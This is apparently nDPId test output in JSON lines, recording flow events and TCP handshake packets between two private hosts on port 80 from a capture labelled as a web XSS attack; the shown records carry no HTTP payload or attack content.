+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347774205,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347774205,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pr5AAD4GHxKsEAABwKgKMu10AFBYS10yAAAAAKACchC++QAAAgQFtAQCCAoBO\/uMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":2,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7XSGo4hpWEtdM6AScSDf5QAAAgQFtAQCCAoD5c0AATv7jAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":3,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pr9AAD4GHxmsEAABwKgKMu10AFBYS10zhqOIaoAQAOV+7QAAAQEICgE7+4wD5c0A"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347775487,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347775487,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kr1AAD4GMxOsEAABwKgKMu2CAFDDYm5xAAAAAKACchBBVQAAAgQFtAQCCAoBO\/zMAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":2,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7YJb\/j+gw2JucqAScSDUbgAAAgQFtAQCCAoD5c5BATv8zAEDAwc="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":3,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kr5AAD4GMxqsEAABwKgKMu2CAFDDYm5yW\/4\/oYAQAOVzdgAAAQEICgE7\/MwD5c5B"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347776753,"flow_last_seen":1499347776753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347776753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1499347776753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KqpAAD4GmyasEAABwKgKMu2QAFCtQdSjAAAAAKACchDv+AAAAgQFtAQCCAoBO\/4JAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":2,"flow_last_seen":1499347776754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776754,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7ZCBpSP4rUHUpKAScSB31wAAAgQFtAQCCAoD5c99ATv+CQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":3,"flow_last_seen":1499347776754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347776754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KqtAAD4Gmy2sEAABwKgKMu2QAFCtQdSkgaUj+YAQAOUW3wAAAQEICgE7\/gkD5c99"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347779333,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347779333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eChAAD4GTaisEAABwKgKMu2qAFDZQnimAAAAAKACchAdVgAAAgQFtAQCCAoBPACOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":2,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7aoAKzpS2UJ4p6AScSAN0AAAAgQFtAQCCAoD5dICATwAjgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":3,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eClAAD4GTa+sEAABwKgKMu2qAFDZQninACs6U4AQAOWs1wAAAQEICgE8AI4D5dIC"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347780605,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347780605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Kg9AAD4Gm8GsEAABwKgKMu24AFBtBSvDAAAAAKACchDVKgAAAgQFtAQCCAoBPAHMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":2,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7bgVufFFbQUrxKAScSD35AAAAgQFtAQCCAoD5dNAATwBzAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":3,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KhBAAD4Gm8isEAABwKgKMu24AFBtBSvEFbnxRoAQAOWW7AAAAQEICgE8AcwD5dNA"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347783176,"flow_last_seen":1499347783176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347783176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1499347783176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8URhAAD4GdLisEAABwKgKMu3SAFAelFVWAAAAAKACchD3bAAAAgQFtAQCCAoBPAROAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":2,"flow_last_seen":1499347783176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7dLS\/qxUHpRVV6AScSCfTwAAAgQFtAQCCAoD5dXDATwETgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":3,"flow_last_seen":1499347783177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347783177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0URlAAD4GdL+sEAABwKgKMu3SAFAelFVX0v6sVYAQAOU+VgAAAQEICgE8BE8D5dXD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347784519,"flow_last_seen":1499347784519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347784519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1499347784519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CDdAAD4GvZmsEAABwKgKMu3gAFDyig2pAAAAAKACchBpxQAAAgQFtAQCCAoBPAWeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":2,"flow_last_seen":1499347784520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7eBCNUBH8ooNqqAScSANLwAAAgQFtAQCCAoD5dcTATwFngEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":3,"flow_last_seen":1499347784520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347784520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CDhAAD4GvaCsEAABwKgKMu3gAFDyig2qQjVASIAQAOWsNQAAAQEICgE8BZ8D5dcT"} 
